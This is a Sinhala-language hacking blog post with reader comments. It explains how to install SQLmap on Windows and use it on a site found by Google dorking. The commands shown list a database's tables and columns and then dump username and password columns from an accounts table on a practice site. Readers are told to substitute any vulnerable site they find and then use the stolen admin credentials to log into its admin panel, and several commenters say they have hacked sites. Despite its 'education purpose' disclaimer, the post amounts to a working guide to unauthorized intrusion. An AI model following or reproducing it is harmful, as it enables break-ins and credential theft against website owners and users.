SQLmap වින්ඩෝස් පරිගණකයක භාවිතා කරන ආකාරය - SL_Tech_Zone

Latest

SL_Tech_Zone

අපගේ නමවතම තාක්ශනික Blog අඩවියට ඔබව සාදරයෙන් පිලිගන්නව...Linux,Windows,Android පිලිබදවත්...අනෙකුත් තාක්ෂණික තොරතුරු අපගේ Blog අඩවියෙන් ඔබට ලබාගත හැක... *Education Purpose Only..! SL_TECH_ZONE Admins : Thilina & Amila

Friday, May 4, 2018

SQLmap වින්ඩෝස් පරිගණකයක භාවිතා කරන ආකාරය



Hacking ගැන උනන්දු අයටනම් මේ SQLmap කියන වචනෙ එච්චර නුහුරු වචනයක් නෙමෙයි.අලුත් අයටත් කියන්න තියෙන්නෙ කලින් SQL Injection ගැන පෝස්ට් එකේ කරපු දේම තමා මේකෙත් කරන්නෙ. කියන්නෙ Vulnerable Site එකක් හොයාගෙන ඒකට attack එකක් දෙන එක.උබල ගොඩක්ම SQLmap පාවිච්චි කරනව දැකල ඇත්තෙ ලිනක්ස් වල.අද මම කියල දෙන්න හදන්නෙ කොහොමද වින්ඩෝස් දාපු මැශින් එකක SQLmap එක පාවිච්චි කරන්නෙ කියල.


මුලින්ම අපි SQLmap ඩවුන්ලෝඩ් කරගන්න ඕනෙ.http://sqlmap.org/ සයිට් ගිහින් ඔයාලට පුලුවන් ඒක කරගන්න.ඕකට ගිහින් ඔය රවුම් කරල තියන Zip file එක ඩවුන්ලෝඩ් කරගන්න.



ඊටප්ස්සෙ ඩෙස්ක්ටොප් එකේ New folder එකක් හදල  ඒක Rename කරන්න  sql කියල.දැන් ඔයාල ඩවුන්ලෝඩ් කරපු Zip file එක ඇතුලෙ තියන ඔක්කොම file ටික අර ඩෙස්ක්ටොප් එකේ හදපු sql ෆෝල්ඩරේට Extract කරගන්න.

ඊලගට අපි Python ඩවුන්ලෝඩ් කරගන්න ඕනෙ.https://www.python.org/ සයිට් එකට  ගිහාම ඔයාලට වර්ශන් දෙකක් පෙනෙයි.කැමති එකක් ගන්න පුලුවන්.මම මේ කෝඩ් දාන්නෙ 2.7 එකට.පොඩි කෝඩ් වෙනස්කම් තමා තියෙන්නෙ හන්ද ඔයාලත් ඒකම ගත්තට කමන්නෑ.ඩවුන්ලෝඩ් කරල ඒක ඉන්ස්ටෝල් කරහම ඔයාල අර හදපු sql ෆෝල්ඩරේට ගිහින් බලන්න ඒකෙ පහල පෙන්නල තියනව වගේ Python logo එකත් එක්ක sqlmap.py කියල ෆයිල් එකක් පෙන්නනවද කියල.ඒක වගේ නෑ කියන්නෙ හරියට Python ඩවුන්ලෝඩ් වෙලා නෑ.

ඔන්න ඔය ඔක්කොම හරි කියන්නෙ SQLmap වලින් වැඩ කරන්න ඔයාලගෙ මැශින් එකත් ලෑස්තී කියන එක.දැන් ඕපන් කරගන්න cmd එක.ඊටපස්සෙ මුලින්ම ඩෙස්ක්ටොප් එක Locate කරගන්න.ඒකට  cd desktop කියල ටයිප් කරල Enter කරන්න.

ඊලගට sql ෆෝල්ඩරේ Locate කරගන්න cd sql කියල ටයිප් කරල Enter කරන්න.ඔන්න අපි දැන් ඉන්නෙ sql ෆෝල්ඩරේ ඇතුලෙ.දැන් කලින් පෝස්ට් එකේ  කියාදුන්න වගේ ගූගල් ඩෝර්ක් එකක් පාවිච්චි කරල Vulnerable Site එකක් හොයාගන්න.
 දැන් cmd එකේ මේ කෝඩ් එක දාල Enter කරන්න.මේකෙ මම සයිට් එකක නමක් දාන්නෙ උබල  එතනට හොයාගත්ත සයිට් එකේ නම දාගෙන කෝඩ් එක වෙනස්  කරගනිල්ල හොදද ✌😎.
sqlmap.py -u https://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs




ඊටපස්සෙ මේ වගේ ඔයාලට දකින්න පුලුවන් SQLmap එක රන් වෙන විදිහ.ඔතන අපෙන් අහනව Continue කරන්නද කියල.ඒකට y දීල Enter කරන්න.ඊටපස්සෙ ටිකක් වෙලා ගිහින් අපිට එනව ඔය වගේ ඩේටබේස් එකේ නම.දැන් මේ විදිහට කෝඩ් එක හදල Enter කරන්න.මේකෙන් කරන්නෙ ටේබල්ස් ටික මොනාද කියල බලාගන්න එක.
sqlmap.py -u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables



ඔතන webscantest කියල තියෙන්නෙ ඩේටබේස් එකේ නම.ඒක ඔයාලට ආපු නම දාල වෙනස් කරන්න.ඔන්න එතකොට මේ වගේ අපිට පෙන්නනව ටේබල් ටික.දැන් ඔතන තිබ්බොත් ඇඩ්මින්ට අදාල මොකක්හරි ටේබල් එකක් ඒකෙ columns ටික බලාගත්තනම් වැඩේ ගොඩ.මේකෙ කොලම් බලන හැටි මම කියන්නම් උබල කරද්දි හොයල ගාණට වැඩේ කරහල්ල.


sqlmap.py -u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts --columns

මේකෙ මම බැලුවෙ accounts කියන ටේබල් එකේ කොලම්. දැන් තේරුනා නේද උබලට ඕන එකේ කොලම් හොයාගන්න හැටි.දැන් අපිට ඕන කොලම් එකේ විස්තර බලමු.

sqlmap.py -u https://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts -c uname,passwd --dump
පේනවනෙ මම uname,passwd කියන කොලම් දෙකේ විස්තර බලන්න තමා ඔය කෝඩ් එක දැම්මෙ.

උබලත් දැන් ඇඩ්මින්ගෙ Username , Password හොයාගත්තනම් කලින් කියදුන්න වගේ ඇඩ්මින් පැනල් එක හොයාගෙන ඕන දෙයක් කරන්න තමා තියෙන්නෙ.ඔන්න ඔහොම තමා වින්ඩෝස් දාපු මැශින් එකක SQLmap එක පාවිච්චි කරන්නෙ. SQL Injection වලට වඩා මේ විදිහ ලේසී නෙහ්.මේ විදිහට ඔන්න පෝස්ට් එකත් ඉවරයි.වැරදි අඩුපාඩු ඔක්කොම කියාගෙන යන්න අමතක කරන්නෙපා 💓.අලුත් දේකින් ආපහු හම්බෙමු.ජයවේවා කට්ටියටම !!!

#ALEX

No One is Safe Security is a Joke  

9 comments:

  1. හැක් කලා තංකූ

    ReplyDelete
    Replies
    1. චොකා <3 පුරුදු වෙයන් ඉන්න ගමන් ඒයි

      Delete
  2. Elama bro maath welawaka karala balanawa. Python nm thiye sql baaganna oona. Wadee hoda digatama karan yanna. Best of luck - Thushara

    ReplyDelete
    Replies
    1. එලම මචෝ.අනිත් පෝස්ට් ටිකත් කියවහන්.අලුතින් පටන් ගත්ත හන්ද උබෙ යාලුවො එහෙම මේකට සෙට් කරල සප් එක දියන් <3<3

      Delete
  3. mewa gas yana wada bro. 🤠 nice tricks. keep it up 🤝👍 jaya

    ReplyDelete
    Replies
    1. Hikzz :-) ආස දේනෙ බන්.Anyway Thanks bro

      Delete
  4. MChn.. meka apita termux eken krnna barida?

    ReplyDelete
    Replies


    1. Puluwan Bro....Lagadima Termux Post set ekak danna hithan innawa..

      Delete